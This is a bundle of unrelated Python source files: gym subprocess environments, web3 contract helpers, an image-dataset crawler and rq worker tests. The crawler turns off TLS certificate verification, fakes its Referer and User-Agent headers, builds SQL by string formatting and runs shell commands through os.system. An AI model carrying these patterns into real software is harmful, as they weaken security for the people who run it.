data_prefix_url, n_threads, max_retries)
return fetcher
def make_wof_filesystem_neighbourhood_fetcher(wof_data_path, n_threads):
fetcher = WofFilesystemNeighbourhoodFetcher(
wof_data_path, n_threads)
return fetcher
def make_wof_model(postgresql_conn_info):
wof_model = WofModel(postgresql_conn_info)
return wof_model
def make_wof_processor(
fetcher, model, redis_cache_index, rawr_enqueuer, logger,
current_date):
from tilequeue.command import explode_and_intersect
wof_processor = WofProcessor(
fetcher, model, redis_cache_index, explode_and_intersect,
rawr_enqueuer, logger, current_date)
return wof_processor
def make_wof_initial_loader(fetcher, model, logger):
wof_loader = WofInitialLoader(fetcher, model, logger)
return wof_loader
|
subproc.py
|
# --- built in ---
import os
import sys
import enum
import time
import logging
import multiprocessing
from typing import Union
# --- 3rd party ---
import gym
import numpy as np
import cloudpickle
# --- my module ---
from unstable_baselines.lib import utils as ub_utils
from unstable_baselines.lib.envs.vec import base as vec_base
__all__ = [
'SubprocVecEnv'
]
class CloudpickleWrapper():
def __init__(self, **kwargs):
self.kwargs = kwargs
def __getattr__(self, key):
return self.kwargs.get(key)
def __getstate__(self):
return cloudpickle.dumps(self.kwargs)
def __setstate__(self, kwargs):
self.kwargs = cloudpickle.loads(kwargs)
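# Note: kwargs are (de)serialized with cloudpickle rather than the standard
# pickle module so that arbitrary callables (e.g. lambdas or closures used as
# env factory functions) can cross the process boundary under the 'spawn' and
# 'forkserver' start methods.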
# Commands
class CMD:
getattr = 1
setattr = 2
reset = 3
step = 4
seed = 5
render = 6
close = 7
def _subproc_worker(_p, p, param_wrapper):
_p.close()
env = param_wrapper.fn()
auto_reset = param_wrapper.auto_reset
try:
while True:
try:
cmd, data = p.recv()
except EOFError: # the pipe has been closed
p.close()
break
if cmd == CMD.getattr:
p.send(getattr(env, data[0], None))
elif cmd == CMD.setattr:
p.send(setattr(env, data[0], data[1]))
elif cmd == CMD.reset:
p.send(env.reset(**data[0]))
elif cmd == CMD.step:
obs, rew, done, info = env.step(data[0])
if auto_reset and done:
obs = env.reset()
p.send((obs, rew, done, info))
elif cmd == CMD.seed:
p.send(env.seed(data[0]))
elif cmd == CMD.render:
p.send(env.render(**data[0]))
elif cmd == CMD.close:
p.send(env.close())
p.close()
break
else:
p.close()
raise NotImplementedError
except KeyboardInterrupt:
p.close()
class SubprocEnvWorker(vec_base.BaseEnvWorker):
def __init__(self, env_fn, auto_reset: bool):
methods = multiprocessing.get_all_start_methods()
start_method = 'spawn'
if 'forkserver' in methods:
start_method = 'forkserver'
ctx = multiprocessing.get_context(start_method)
self.p, _p = ctx.Pipe()
args = (
self.p, _p, CloudpickleWrapper(fn=env_fn, auto_reset=auto_reset)
)
self.process = ctx.Process(target=_subproc_worker, args=args, daemon=True)
self.process.start()
self._waiting_cmd = None
_p.close()
super().__init__(env_fn, auto_reset)
def getattr(self, attrname: str):
return self._cmd(CMD.getattr, attrname)
def setattr(self, attrname: str, value):
return self._cmd(CMD.setattr, attrname, value)
def reset(self, **kwargs):
return self._cmd(CMD.reset, kwargs)
def step_async(self, act):
return self._cmd(CMD.step, act, wait=False)
def step_wait(self):
return self._wait(CMD.step)
def seed(self, seed):
super().seed(seed)
return self._cmd(CMD.seed, seed)
def render(self, **kwargs):
return self._cmd(CMD.render, kwargs)
def close_async(self):
return self._cmd(CMD.close, wait=False)
def close_wait(self):
return self._wait(CMD.close, timeout=1)
def _cmd(self, cmd, *args, wait=True):
#TODO: find a more reliable way
if self._waiting_cmd and cmd != CMD.close:
raise RuntimeError(f'Another command {cmd} was sent when '
f'waiting for the reply {self._waiting_cmd}')
self.p.send([cmd, args])
self._waiting_cmd = cmd # marked as waiting reply
if wait:
return self._wait(cmd)
def _wait(self, cmd, timeout=None):
if self._waiting_cmd != cmd:
raise RuntimeError
res = None
if self.p.poll(timeout):
res = self.p.recv()
self._waiting_cmd = None #unmarked
return res
class SubprocVecEnv(vec_base.BaseVecEnv):
def __init__(self,
env_fns: list,
rms_norm: Union[str, bool, ub_utils.RMSNormalizer] = False,
auto_reset: bool = True,
):
super().__init__(env_fns, SubprocEnvWorker, rms_norm, auto_reset)
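# Minimal usage sketch, kept as a comment (assumes gym provides a registered
# environment id such as 'CartPole-v1'; the exact vectorised API is defined by
# vec_base.BaseVecEnv):
#
#   venv = SubprocVecEnv([lambda: gym.make('CartPole-v1') for _ in range(4)])
#   obs = venv.reset()
#   ...
#   venv.close()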
|
utils.py
|
import web3
import solc
import time
import threading
import hashlib
import os
w3 = None
cache = {}
def connect():
global w3
if w3 is None or not w3.isConnected():
# large request timeout require for performance tests
w3 = web3.Web3(web3.HTTPProvider('http://127.0.0.1:8545', request_kwargs={'timeout': 60 * 10}))
assert w3.isConnected()
return w3
def filehash(path):
with open(path, 'rb') as f:
return hashlib.md5(f.read()).hexdigest()
def compile_contract(contract_name):
""" compiles the given contract (from the ./contracts folder)
and returns its ABI interface
"""
path = os.getcwd()
if path.endswith('client'):
path = f'../contracts/{contract_name}.sol'
else:
path = f'./contracts/{contract_name}.sol'
h = filehash(path)
interface = cache.get(h)
if interface:
return interface
with open(path) as f:
src = f.read()
for i in solc.compile_source(src, optimize=True).values():
interface = i
break
cache[h] = interface
return interface
def get_contract(contract_name, contract_address, patch_api=True):
""" gets the instance of an already deployed contract
if patch_api is set, all transactions are automatically syncronized, unless wait=False is specified in the tx
"""
connect()
interface = compile_contract(contract_name)
instance = w3.eth.contract(
address=contract_address,
abi=interface['abi'],
ContractFactoryClass=web3.contract.ConciseContract,
)
if patch_api:
for name, func in instance.__dict__.items():
if isinstance(func, web3.contract.ConciseMethod):
instance.__dict__[name] = _tx_executor(func)
# add event handling stuff to the instance object
contract = w3.eth.contract(abi=interface['abi'], bytecode=interface['bin'])
instance.eventFilter = contract.eventFilter
instance.events = contract.events
return instance
def _tx_executor(contract_function):
""" modifies the contract instance interface function such that whenever a transaction is performed
it automatically waits until the transaction in included in the blockchain
(unless wait=False is specified, in the case the default the api acts as usual)
"""
def f(*args, **kwargs):
wait = kwargs.pop('wait', True)
if 'transact' in kwargs and wait:
tx_hash = contract_function(*args, **kwargs)
tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
return tx_receipt
return contract_function(*args, **kwargs)
return f
def deploy_contract(
contract_name, account=None, patch_api=True, return_tx_receipt=False
):
""" compiles and deploy the given contract (from the ./contracts folder)
returns the contract instance
"""
connect()
if account is None:
account = w3.eth.accounts[-1]
interface = compile_contract(contract_name)
contract = w3.eth.contract(abi=interface['abi'], bytecode=interface['bin'])
# increase the max gas limit if needed, e.g.:
# tx_hash = contract.constructor().transact({'from': account, 'gas': 7_500_000})
tx_hash = contract.constructor().transact({'from': account, 'gas': 5_000_000})
tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
c = get_contract(contract_name, tx_receipt['contractAddress'], patch_api)
if return_tx_receipt:
return c, tx_receipt
return c
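# Hedged usage sketch (contract and method names are placeholders; it assumes a
# matching ./contracts/MyToken.sol exists and a local node is reachable):
#
#   token = deploy_contract('MyToken')
#   accounts = w3.eth.accounts
#   receipt = token.transfer(accounts[1], 10, transact={'from': accounts[0]})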
def flatten(list_of_lists):
return [y for x in list_of_lists for y in x]
def get_events(contract_instance, event_name, from_block=0, to_block=None):
# eventFilter = contract.eventFilter(event_name, {'fromBlock': 0})
eventFilter = contract_instance.events.__dict__[event_name].createFilter(
fromBlock=from_block, toBlock=to_block
)
return [
e
for e in eventFilter.get_all_entries()
if e.address == contract_instance.address
]
def wait_for(predicate, check_interval=1.0):
while not predicate():
time.sleep(check_interval)
def mine_block():
connect()
w3.providers[0].make_request('evm_mine', params='')
def mine_blocks(num_blocks):
for i in range(num_blocks):
mine_block()
def mine_blocks_until(predicate):
while not predicate():
mine_block()
def blockNumber():
connect()
return w3.eth.blockNumber
def run(func_or_funcs, args=()):
""" executes the given functions in parallel and waits
until all execution have finished
"""
threads = []
if isinstance(func_or_funcs, list):
funcs = func_or_funcs
for i, f in enumerate(funcs):
arg = args[i] if isinstance(args, list) else args
if (arg is not None) and (not isinstance(arg, tuple)):
arg = (arg,)
threads.append(threading.Thread(target=f, args=arg))
else:
func = func_or_funcs
assert isinstance(args, list)
for arg in args:
xarg = arg if isinstance(arg, tuple) else (arg,)
threads.append(threading.Thread(target=func, args=xarg))
for t in threads:
t.start()
for t in threads:
t.join()
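# Usage sketch (worker_fn stands in for any callable defined elsewhere):
#
#   run([mine_block, mine_block])     # run two functions in parallel
#   run(worker_fn, args=[1, 2, 3])    # run worker_fn(1), worker_fn(2), worker_fn(3) in parallel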
|
dbdlml.py
|
'''
Encoding of image analysis errors: add the numbers below to 8 to encode all
error types (so status values 9..23 are reserved for describing errors)
- general exception: 1
- bad format: 2
- image too big: 4
- image too small: 8
- any combination of the above
'''
import gc
import os
import ssl
import sys
import time
import trio
import uuid
import ujson
import shutil
import tarfile
import pandas as pd
from glob import glob
from uuid import uuid1
from io import BytesIO
from datetime import datetime
from sqlalchemy import create_engine
from configparser import ConfigParser
from PIL import Image, ImageFile, UnidentifiedImageError
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
from multiprocessing import Process, cpu_count
sys.path.append('./crawlingathome-worker/')
import asks
asks.init("trio")
ImageFile.LOAD_TRUNCATED_IMAGES = True # https://stackoverflow.com/a/47958486
ssl_ctx = ssl.create_default_context()
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
def config(filename='database.ini', section='cah_production'):
# create a parser
parser = ConfigParser()
# read config file
parser.read(filename)
# get section, default to postgresql
db = {}
if parser.has_section(section):
params = parser.items(section)
for param in params:
db[param[0]] = param[1]
else:
raise Exception('Section {0} not found in the {1} file'.format(section, filename))
return db
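# Example database.ini layout this parser expects (section name and values are
# placeholders; only the keys are significant for the engine built in __main__):
#
#   [cah_production]
#   host = 127.0.0.1
#   database = cah
#   user = cah_user
#   password = secret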
class Tracer(trio.abc.Instrument):
def __init__(self):
self.exceptions = 0
self.requests = 0
self.downloads = 0
self.imgproc_duration = 0
self.download_duration = 0
self.error_duration = 0
def task_exited(self, task):
if task.custom_sleep_data is not None:
if task.custom_sleep_data[0] in [1, 3]: # this is exception
self.exceptions += 1
self.error_duration += task.custom_sleep_data[2]
if task.custom_sleep_data[0] == 0: # this is image downloaded
self.download_duration += task.custom_sleep_data[1]
self.imgproc_duration += task.custom_sleep_data[2]
self.downloads += 1
def after_run(self):
rate = round(self.exceptions / (self.exceptions + self.downloads + sys.float_info.epsilon), 2)
avg_download = round(self.download_duration / (self.downloads + sys.float_info.epsilon), 2)
avg_process = round(self.imgproc_duration / (self.downloads + sys.float_info.epsilon), 2)
avg_error = round(self.error_duration / (self.exceptions + sys.float_info.epsilon), 2)
print(f"[instrumentation] While scraping there were {self.exceptions} errors within {self.downloads + self.exceptions} candidates (error rate = {round(rate * 100,2)} %). {self.downloads} images were downloaded.")
print(f"[instrumentation] Cumulative image processing duration {round(self.imgproc_duration, 2)} s.")
print(f"[instrumentation] Average downloading time {avg_download} s/img, image processing time {avg_process} s/img, exceptions processing time {avg_error} s/link")
def log(e):
with open("errors.txt","a") as f:
f.write(str(e.__class__.__name__) + " " + str(e) + "\n")
def process_img_content(response, alt_text, license, sample_id, language, i):
"""
Function to process a downloaded image. Uses PIL from pillow-simd
(faster than OpenCV, which in turn is faster than the original Pillow)
input: web request response, ALT text, license and sample id
output: list of image parameters; the STATUS field encodes success (2) or an error code
"""
img_output_folder = f"./{i}/save/images/"
error_code = 8
# temporary workaround: default a missing language to English
if language == "" or language is None:
language = "en"
def _resize(im: Image):
width, height = im.size
ratio = min(width, height) / 224
new_width = int(round(width/ratio,0))
new_height = int(round(height/ratio,0))
im = im.resize((new_width, new_height), resample=Image.BICUBIC)
if new_width > 224 or new_height > 224:
left = (new_width - 224)/2
top = (new_height - 224)/2
right = (new_width + 224)/2
bottom = (new_height + 224)/2
# Crop the center of the image
im = im.crop((left, top, right, bottom))
return im
try:
# reject too small images
if len(response.content) < 5000:
error_code += 8
img_data = BytesIO(response.content)
with Image.open(img_data) as im:
width, height = im.size
# reject if too large (might be a DOS decompression bomb)
if width * height > 89478484:
error_code += 4
im_format = im.format
out_fname = f"{img_output_folder}{str(sample_id)}.{im_format.lower()}"
# reject if format is not in this list
if im_format not in ["JPEG", "JPG", "PNG", "WEBP"]:
error_code += 2
if min(width, height) > 224:
im = _resize(im)
# convert all images to RGB (necessary for CLIP, also CLIP is doing it again so do we need it here?)
if im.mode != "RGB":
im = im.convert("RGB")
if error_code == 8:
im.save(out_fname) # do not retain images we do not need
except (KeyError, UnidentifiedImageError):
out_fname = ""
width = 0
height = 0
error_code += 1
if error_code == 8:
error_code = 2 # mark successful lines with status = 2
return [str(sample_id), out_fname, response.url, alt_text, width, height, license, language, error_code]
async def request_image(parsed_df, i):
"""
This function opens many parallel async connections to try to download the images from the provided links
input: dataframe of validated links and the worker index (used to locate the working folders)
output: list of lists with successfully downloaded images and their parameters; this list is dumped to disk as a json file
"""
tmp_data = []
limit = trio.CapacityLimiter(1000)
# tune the number of parallel connections based on CPU speed, network capabilities, etc.
# (earlier runs used 192 connections, sized for a 1 vCPU droplet at Hetzner Cloud, code CX11)
session = asks.Session(connections=64, ssl_context=ssl_ctx)
software_names = [SoftwareName.CHROME.value]
operating_systems = [OperatingSystem.LINUX.value]
user_agent_rotator = UserAgent(software_names=software_names, operating_systems=operating_systems, limit=2000)
user_agent = user_agent_rotator.get_random_user_agent()
# try to make the bot website friendly
session.headers = {
"User-Agent": user_agent,
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Referer": "https://google.com",
"DNT": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
}
async def _request(row, i):
start=time.time()
sample_id = row[0]
url = row[1]
alt_text = row[2]
license = row[3]
language = row[4]
# grab the current task so the Trio Instrument (Tracer) can attribute timings per task
task = trio.lowlevel.current_task()
try:
# tune timeout and connection_timeout to grab more or fewer files; shorter timeouts exclude badly performing websites
response = await session.get(url, timeout=10, connection_timeout=20)
dltime = round(time.time()-start, 2)
start=time.time()
proces = process_img_content(
response, alt_text, license, sample_id, language, i
)
proctime = round(time.time()-start, 2)
task.custom_sleep_data = (0, dltime, proctime) # for success do not count errors
if proces is not None:
tmp_data.append(proces)
except Exception as e:
log(e)
task.custom_sleep_data = (1, 0, round(time.time()-start,2)) # when exception is hit, count it
async with trio.open_nursery() as n:
for index, row in parsed_df.iterrows():
async with limit:
n.start_soon(_request, row, i)
# trio makes sure at this point all async tasks were executed
with open(f"./{i}/.tmp/{uuid1()}.json", "w") as f:
ujson.dump(tmp_data, f)
gc.collect()
return
def dl_wat(parsed_df, i): # replace valid data and start sampleid with parsed_df
"""
This function initiates download attempt of validated parsed links
It launches multithreaded tasks by using trio module
input: dataset of validated links, the sample id to start with
output: dataframe of downloaded images and their parameters
"""
# Download every image available
processed_samples = []
#trio.run(request_image, valid_data, first_sample_id, instruments=[TrioProgress(len(valid_data), False)] )
trio.run( request_image, parsed_df, i, instruments=[Tracer()] )
for tmpf in glob(f"./{i}/.tmp/*.json"):
processed_samples.extend(ujson.load(open(tmpf)))
return pd.DataFrame(
processed_samples,
columns=["SAMPLE_ID", "PATH", "URL", "TEXT", "HEIGHT", "WIDTH", "LICENSE", "LANGUAGE", "STATUS"],
)
def upload(source: str, clientType: str, target: str):
with tarfile.open(f"{source}.tar.gz", "w:gz") as tar:
tar.add(source, arcname=os.path.basename(source))
result = os.system(f"rsync -av {source}.tar.gz {target}")
if os.path.exists(f"{source}.tar.gz"):
os.remove(f"{source}.tar.gz")
if os.path.exists(f"{source}"):
shutil.rmtree(f"{source}", ignore_errors=True)
return result
def newJob(engine):
# strict selection of distinct domains
#select_stmt1 = "UPDATE dataset SET status = 1 WHERE sampleid IN (SELECT DISTINCT ON (domain) sampleid FROM (SELECT domain, sampleid FROM dataset TABLESAMPLE SYSTEM (0.05) WHERE status = 0 LIMIT 1000000 FOR UPDATE SKIP LOCKED) as \"U\" LIMIT 10000) AND status = 0 RETURNING sampleid"
# selection on domains based on distribution of URLs per domain
select_stmt1 = "UPDATE dataset_intl SET status = 1 WHERE sampleid IN (SELECT sampleid FROM dataset_intl WHERE status = 0 and language != 'en' LIMIT 10000 FOR UPDATE SKIP LOCKED) AND status = 0 RETURNING sampleid"
conn = engine.raw_connection()
cur = conn.cursor()
cur.execute(select_stmt1)
result = cur.fetchall()
conn.commit()
cur.close()
values = ",".join([str(tuple[0]) for tuple in result])
select_stmt2 = "SELECT sampleid, url, text, license, language FROM dataset_intl WHERE sampleid in ({})".format(values)
#select_stmt2 = "UPDATE dataset_en SET status = 1 WHERE sampleid IN (SELECT sampleid FROM dataset_en TABLESAMPLE SYSTEM (0.1) WHERE status = 0 LIMIT 10000 FOR UPDATE SKIP LOCKED) AND status = 0 RETURNING sampleid, url, text, license, language"
df = pd.read_sql_query(select_stmt2, conn)
conn.close()
return df
def completeJob2(engine, prefix, parsed_df, dlparse_df):
# prepare the per-sample update statements
values2 = ",".join(parsed_df["sampleid"].astype(str))
update_stmt1 = ""
for i, row in dlparse_df.iterrows():
update_stmt1 += "UPDATE dataset_intl SET status={}, width={}, height={} where sampleid = {};".format(row["STATUS"],row["HEIGHT"],row["WIDTH"],row["SAMPLE_ID"])
# this is an intentional mix-up between width and height, to account for the bug in the previous laion release
# the csv will stay scrambled, but in the database we want correct values
insert_stmt = "INSERT INTO jobs_intl (jobid) VALUES ('{}')".format(prefix)
if len(dlparse_df.index) > 0:
conn = engine.raw_connection()
cur = conn.cursor()
cur.execute(update_stmt1)
cur.execute(insert_stmt)
conn.commit()
cur.close()
conn.close()
# in case there are samples unaccounted for, we try to mark them with general error status
update_stmt2 = "UPDATE dataset_intl SET status = 9 where status = 1 AND sampleid in ({})".format(values2)
conn = engine.raw_connection()
cur = conn.cursor()
cur.execute(update_stmt2)
conn.commit()
cur.close()
conn.close()
return
def worker(engine, params, i):
# initialize working folders
tmp_folder = f"./{i}/.tmp/"
output_folder = f"./{i}/save/"
img_output_folder = output_folder + "images/"
while True:
try:
start = time.time()
start0 = start
parsed_df = newJob(engine)
prefix = uuid.uuid4().hex
result = 0
# clear working folders for a new job
if os.path.exists(output_folder):
shutil.rmtree(output_folder, ignore_errors=True)
if os.path.exists(tmp_folder):
shutil.rmtree(tmp_folder, ignore_errors=True)
os.makedirs(output_folder)
os.makedirs(img_output_folder)
os.makedirs(tmp_folder)
# compute output file names base
out_fname = f"3_staged_workflow_job_{prefix}_full_wat"
print(f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] Job acquired in {round(time.time()-start,2)} sec")
start = time.time()
print (f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] This job has {len(parsed_df)} candidates")
# attempt to download validated links and save to disk for stats and blocking lists
dlparse_df = dl_wat(parsed_df, i)
dlparse_df_save = dlparse_df[dlparse_df["STATUS"]==2] # remove rejected items from gpu jobs
dlparse_df_save.to_csv(output_folder + out_fname + ".csv", index=False, sep="|")
# at this point we have finished the CPU node job and need to make the data available for the GPU worker
os.mkdir(prefix)
os.system(f"mv ./{i}/save/* {prefix}/")
result += upload(prefix, "CPU", "archiveteam@176.9.4.150::gpujobsml") #todo find the IP and endpoint
if result == 0:
completeJob2(engine, prefix, parsed_df, dlparse_df)
print (f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] pairs retained {len(dlparse_df_save)} in {round(time.time() - start, 2)}")
print (f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] scraping efficiency {len(dlparse_df_save)/(time.time() - start)} img/sec")
print (f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] crawling efficiency {len(parsed_df)/(time.time() - start)} links/sec")
last = round(time.time() - start0)
print(f"[{datetime.now().strftime('%H:%M:%S')} stats {i}] Job completed in {last} seconds")
except Exception as e:
print (e)
print (f"{datetime.now().strftime('%H:%M:%S')} Worker {i} crashed")
time.sleep(60)
if __name__ == "__main__":
print (f"starting session")
procs = cpu_count()
params = config()
engine = create_engine(f'postgresql://{params["user"]}:{params["password"]}@{params["host"]}:5432/{params["database"]}', pool_size=procs, max_overflow=int(procs*1.5), pool_recycle=60, pool_pre_ping=True )
for i in range(1):
Process(target=worker, args=[engine, params, i], daemon=True).start()
try:
while True:
time.sleep(30)
except KeyboardInterrupt:
sys.exit()
|
test_worker.py
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta, timezone
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid,
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus, Retry
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus
class CustomJob(Job):
pass
class CustomQueue(Queue):
pass
class TestWorker(RQTestCase):
def test_create_worker(self):
"""Worker creation using various inputs."""
# With single string argument
w = Worker('foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of strings
w = Worker(['foo', 'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
self.assertEqual(w.queue_names(), ['foo', 'bar'])
# With iterable of strings
w = Worker(iter(['foo', 'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# Also accept byte strings in Python 2
if PY2:
# With single byte string argument
w = Worker(b'foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of byte strings
w = Worker([b'foo', b'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With iterable of byte strings
w = Worker(iter([b'foo', b'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With single Queue
w = Worker(Queue('foo'))
self.assertEqual(w.queues[0].name, 'foo')
# With iterable of Queues
w = Worker(iter([Queue('foo'), Queue('bar')]))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With list of Queues
w = Worker([Queue('foo'), Queue('bar')])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With string and serializer
w = Worker('foo', serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
# With queue having serializer
w = Worker(Queue('foo'), serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo'), Queue('bar')
w = Worker([fooq, barq])
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_worker_all(self):
"""Worker.all() works properly"""
foo_queue = Queue('foo')
bar_queue = Queue('bar')
w1 = Worker([foo_queue, bar_queue], name='w1')
w1.register_birth()
w2 = Worker([foo_queue], name='w2')
w2.register_birth()
self.assertEqual(
set(Worker.all(connection=foo_queue.connection)),
set([w1, w2])
)
self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
w1.register_death()
w2.register_death()
def test_find_by_key(self):
"""Worker.find_by_key restores queues, state and job_id."""
queues = [Queue('foo'), Queue('bar')]
w = Worker(queues)
w.register_death()
w.register_birth()
w.set_state(WorkerStatus.STARTED)
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.queues, queues)
self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
self.assertEqual(worker._job_id, None)
self.assertTrue(worker.key in Worker.all_keys(worker.connection))
self.assertEqual(worker.version, VERSION)
# If worker is gone, its keys should also be removed
worker.connection.delete(worker.key)
Worker.find_by_key(worker.key)
self.assertFalse(worker.key in Worker.all_keys(worker.connection))
self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
"""Worker ttl."""
w = Worker([])
w.register_birth()
[worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
self.assertIsNotNone(self.testconn.ttl(worker_key))
w.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
def test_job_times(self):
"""job times are set correctly."""
q = Queue('foo')
w = Worker([q])
before = utcnow()
before = before.replace(microsecond=0)
job = q.enqueue(say_hello)
self.assertIsNotNone(job.enqueued_at)
self.assertIsNone(job.started_at)
self.assertIsNone(job.ended_at)
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Stranger!')
after = utcnow()
job.refresh()
self.assertTrue(
before <= job.enqueued_at <= after,
'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
)
self.assertTrue(
before <= job.started_at <= after,
'Not %s <= %s <= %s' % (before, job.started_at, after)
)
self.assertTrue(
before <= job.ended_at <= after,
'Not %s <= %s <= %s' % (before, job.ended_at, after)
)
def test_work_is_unreadable(self):
"""Unreadable jobs are put on the failed job registry."""
q = Queue()
self.assertEqual(q.count, 0)
# NOTE: We have to fake this enqueueing for this test case.
# What we're simulating here is a call to a function that is not
# importable from the worker process.
job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
job.save()
job_data = job.data
invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
assert job_data != invalid_data
self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
# We use the low-level internal function to enqueue any data (bypassing
# validity checks)
q.push_job_id(job.id)
self.assertEqual(q.count, 1)
# All set, we're going to process it
w = Worker([q])
w.work(burst=True) # should silently pass
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
"""Heartbeat saves last_heartbeat"""
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
self.assertEqual(w.hostname,
as_text(self.testconn.hget(w.key, 'hostname')))
last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
self.assertTrue(last_heartbeat is not None)
w = Worker.find_by_key(w.key)
self.assertIsInstance(w.last_heartbeat, datetime)
# worker.refresh() shouldn't fail if last_heartbeat is None
# for compatibility reasons
self.testconn.hdel(w.key, 'last_heartbeat')
w.refresh()
# worker.refresh() shouldn't fail if birth is None
# for compatibility reasons
self.testconn.hdel(w.key, 'birth')
w.refresh()
@slow
def test_heartbeat_busy(self):
"""Periodic heartbeats while horse is busy with long jobs"""
q = Queue()
w = Worker([q], job_monitoring_interval=5)
for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
job = q.enqueue(long_running_job,
args=(timeout,),
job_timeout=30,
result_ttl=-1)
with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
w.execute_job(job, q)
self.assertEqual(mocked.call_count, expected_heartbeats)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
"""Failing jobs are put on the failed queue."""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(div_by_zero)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
w.work(burst=True) # should silently pass
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_statistics(self):
"""Successful and failed job counts are saved properly"""
queue = Queue()
job = queue.enqueue(div_by_zero)
worker = Worker([queue])
worker.register_birth()
self.assertEqual(worker.failed_job_count, 0)
self.assertEqual(worker.successful_job_count, 0)
self.assertEqual(worker.total_working_time, 0)
registry = StartedJobRegistry(connection=worker.connection)
job.started_at = utcnow()
job.ended_at = job.started_at + timedelta(seconds=0.75)
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 1)
self.assertEqual(worker.successful_job_count, 1)
self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 2)
self.assertEqual(worker.successful_job_count, 2)
self.assertEqual(worker.total_working_time, 3.0)
def test_handle_retry(self):
"""handle_job_failure() handles retry properly"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=2)
job = queue.enqueue(div_by_zero, retry=retry)
worker = Worker([queue])
# If job is configured to retry, it will be put back in the queue
# This is the original execution
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 1)
self.assertEqual([job.id], queue.job_ids)
# First retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([job.id], queue.job_ids)
# Second retry
queue.empty()
